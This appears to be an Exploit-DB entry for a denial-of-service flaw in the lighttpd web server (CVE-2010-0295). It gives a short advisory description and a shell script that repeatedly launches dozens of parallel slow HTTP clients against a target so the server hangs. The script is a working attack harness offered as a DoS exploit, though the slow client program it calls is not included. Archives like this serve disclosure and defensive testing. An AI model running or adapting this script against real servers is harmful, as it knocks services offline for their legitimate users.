lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability

2010-02-02T00:00:00
ID EDB-ID:33591
Type exploitdb
Reporter Li Ming
Modified 2010-02-02T00:00:00

Description

lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability. CVE-2010-0295 . Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/38036/info

The 'lighttpd' webserver is prone to a denial-of-service vulnerability.

Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users. 

##slow_test.sh
for ((j=0;j<1000;j++)) do
  for ((i=0; i<50; i++)) do
  ## slow_client is a C program which sends a HTTP request very slowly
    ./slow_client http://www.example.com/>/dev/null 2>/dev/null &
  done&
  sleep 3
done